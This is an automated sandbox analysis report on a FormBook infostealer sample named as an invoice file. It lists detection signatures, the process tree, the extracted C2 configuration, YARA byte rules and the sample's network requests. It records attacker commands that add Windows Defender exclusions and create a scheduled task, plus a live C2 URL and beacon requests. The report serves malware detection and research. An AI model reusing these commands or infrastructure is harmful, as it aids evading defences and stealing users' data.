Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report HAWB AND INV.exe

Overview

General Information

Sample Name:HAWB AND INV.exe
Analysis ID:402848
MD5:42662765a94ce5ece11529509f937711
SHA1:da57dd4c137c47fc9b906caaf067c6ed13fa2da6
SHA256:2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HAWB AND INV.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: 42662765A94CE5ECE11529509F937711)
    • powershell.exe (PID: 6932 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7072 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • HAWB AND INV.exe (PID: 6156 cmdline: C:\Users\user\Desktop\HAWB AND INV.exe MD5: 42662765A94CE5ECE11529509F937711)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alldaazz.com/maw9/"], "decoy": ["jaimericart.com", "mayavantcard.com", "romanzava.site", "forefrontunderground.com", "grafikirmarketing.com", "airpoppoff.com", "captureq.com", "vph.ventures", "historiclocation.com", "theoxfordway.com", "springersells.com", "huther.mobi", "networkingmaderas.com", "reggatech.com", "dollfacela.com", "moneycrypt.net", "calidad-precio.net", "hamnsk165.com", "victoriabrownrealtor.com", "itechfreak.com", "bernardocammarata.com", "alfredoarlington.com", "rencontre-montpellier.com", "vipbrandwatch.info", "nhahangminhcuong.com", "senmec23.com", "onemoreusa.com", "dinkoistmatrimony.com", "ideasparatubebe.com", "pozickyauveryinfossk.com", "buildingba.com", "heoslight.com", "ventadecalsotsdevalls.com", "app-cintavcsuges.com", "culturaenmistacones.com", "whyiamvoting.com", "blackopstravel.club", "poorwhitetrashlivesmatters.com", "beachrockisland.com", "natrium-ionen-akkus.com", "noxi.store", "whichrace.com", "mindfulprovision.com", "nznatureguides.com", "fullautoimage.com", "sharonbakcht.com", "ournursingdegreesworld.com", "parismedspas.com", "premier-moment.info", "curvygirlholiday.com", "getsuperyouth.com", "177palmer.com", "headstronghairstudio.com", "sasdrawing.com", "drinkhydrateyourcoffee.com", "globalifier.com", "protocolpolitician.com", "edinglow.com", "isimplix.com", "trendylifefashion.com", "ferhou.com", "ellarewster.club", "ecosanhn.com", "newedulist.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.HAWB AND INV.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.HAWB AND INV.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.HAWB AND INV.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        10.2.HAWB AND INV.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.HAWB AND INV.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 5 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\HAWB AND INV.exe' , ParentImage: C:\Users\user\Desktop\HAWB AND INV.exe, ParentProcessId: 6752, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', ProcessId: 7072

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.alldaazz.com/maw9/"], "decoy": ["jaimericart.com", "mayavantcard.com", "romanzava.site", "forefrontunderground.com", "grafikirmarketing.com", "airpoppoff.com", "captureq.com", "vph.ventures", "historiclocation.com", "theoxfordway.com", "springersells.com", "huther.mobi", "networkingmaderas.com", "reggatech.com", "dollfacela.com", "moneycrypt.net", "calidad-precio.net", "hamnsk165.com", "victoriabrownrealtor.com", "itechfreak.com", "bernardocammarata.com", "alfredoarlington.com", "rencontre-montpellier.com", "vipbrandwatch.info", "nhahangminhcuong.com", "senmec23.com", "onemoreusa.com", "dinkoistmatrimony.com", "ideasparatubebe.com", "pozickyauveryinfossk.com", "buildingba.com", "heoslight.com", "ventadecalsotsdevalls.com", "app-cintavcsuges.com", "culturaenmistacones.com", "whyiamvoting.com", "blackopstravel.club", "poorwhitetrashlivesmatters.com", "beachrockisland.com", "natrium-ionen-akkus.com", "noxi.store", "whichrace.com", "mindfulprovision.com", "nznatureguides.com", "fullautoimage.com", "sharonbakcht.com", "ournursingdegreesworld.com", "parismedspas.com", "premier-moment.info", "curvygirlholiday.com", "getsuperyouth.com", "177palmer.com", "headstronghairstudio.com", "sasdrawing.com", "drinkhydrateyourcoffee.com", "globalifier.com", "protocolpolitician.com", "edinglow.com", "isimplix.com", "trendylifefashion.com", "ferhou.com", "ellarewster.club", "ecosanhn.com", "newedulist.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeReversingLabs: Detection: 21%
          Multi AV Scanner detection for submitted fileShow sources
          Source: HAWB AND INV.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE
          Source: 10.2.HAWB AND INV.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HAWB AND INV.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HAWB AND INV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.alldaazz.com/maw9/
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.dinkoistmatrimony.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.premier-moment.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.ecosanhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.curvygirlholiday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.networkingmaderas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.dinkoistmatrimony.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.premier-moment.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.ecosanhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.curvygirlholiday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.networkingmaderas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.dinkoistmatrimony.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 03 May 2021 12:53:52 GMTServer: LiteSpeedData Raw: 32 38 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43
          Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: powershell.exe, 00000002.00000002.526394287.0000000002FEF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
